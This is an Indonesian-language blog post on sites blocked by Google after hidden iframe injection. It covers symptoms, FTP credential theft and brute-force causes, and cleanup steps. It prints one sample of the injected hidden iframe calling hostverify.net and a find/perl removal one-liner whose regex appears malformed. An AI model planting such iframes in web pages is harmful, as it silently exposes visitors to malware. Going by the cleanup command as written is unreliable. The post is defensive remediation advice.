Website diblokir Google akibat injeksi iframe

Apakah anda pernah mendapati web anda tampil seperti ini

Bisa jadi situs web anda terkena injeksi iframe, Injeksi iframe sebenarnya sudah ada cukup lama, saya pertama kali menemukan kasus ini pada Juni 2008 dan sudah pernah saya posting di blog ini dengan judul awas malware money 2008

Tapi sampai saat ini masih tetap banyak website-website yang berjatuhan dan di blok oleh google karena websitenya sudah terkena injeksi ini.

Ciri-ciri website anda terkena injeksi iframe

1. Site anda di blokir google seperti pada gambar sebelumnya dan jika anda klik button Why was this site blocked akan menuju ke detail permasalahan. Perhatikan terdapat 1 mailcious software didalam website anda yang merujuk ke vistersearch.info
   
2. Biasanya di file index.php/index.html terdapat script aneh dibagian bawah sendiri yang berawalan <iframe src= dst… misalnya seperti ini

<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

jika anda menemukan sript seperti ini segera hapus script tsb.

Umumnya Injeksi Iframe dilakukan dengan 2 jalan

1. Injeksi iframe ini disebabkan oleh malware yaitu program jahat yang telah menyelinap masuk dan menginfeksi komputer anda selanjutnya mencari informasi keberadaan user dan password FTP yang anda simpan pada applikasi FTP client seperti FileZilla atau WS FTP

2. injeksi iframe disebabkan Brute Force Attack yaitu serangan langsung ke server bisa dengan botnet untuk mendapatkan passwd FTP yang selanjutya akan digunakan untuk proses injeksi. hal ini terbukti dari log server

Oct 27 15:51:35 server proftpd[6756]: icanza.pusathosting.com (::ffff:78.102.162.128[::ffff:78.102.162.128]) – USER administrator (Login failed): Incorrect password.
Oct 27 18:19:08 server proftpd[13526]: icanza.pusathosting.com (::ffff:188.243.242.36[::ffff:188.243.242.36]) – USER anny (Login failed): Incorrect password.
Oct 27 20:14:27 server proftpd[12740]: icanza.pusathosting.com (::ffff:87.101.25.150[::ffff:87.101.25.150]) – USER administrators (Login failed): Incorrect password.

Solusi penyelesaian masalah ini

1. Ubah passwd hosting murah panel anda segera, gunakan passwd dengan kombinasi yang sussah ditebak misalnya huruf kecil, huruf besar dan angka.
2. Sementara jangan login ke account hosting anda menggunakan FTP
3. Login ke account hosting anda melalui hosting panel dan berishkan file yang terinfeksi secara manual. atau jika anda mempunyai akses ssh anda bisa menggunakan script berikut untuk menghapus secara otomatis semua file yang terinfeksi# find . -name ‘*.*’ | xargs perl -pi -e ‘s/<iframe src.*vistasearch.info.*$</iframe>//g’
   
   Anda cukup merubah vistasearch dan ekstensi domain .info sesuai domain yang menginfeksi website anda.

4. Mengajukan review dengan menggunakan Google Web master Tools (http://www.google.com/webmasters/)
5. Menunggu dengan sabar, jika dalam 1 minggu masih terblokir silahkan kontak hosting provider anda untuk membantu melakukan pengecekan karena umumnya setelah request review tidak sampai 1 minggu web sudah kembali normal.

sumber tambahan

http://www.guardian.co.uk/technology/2008/apr/03/security.google

http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/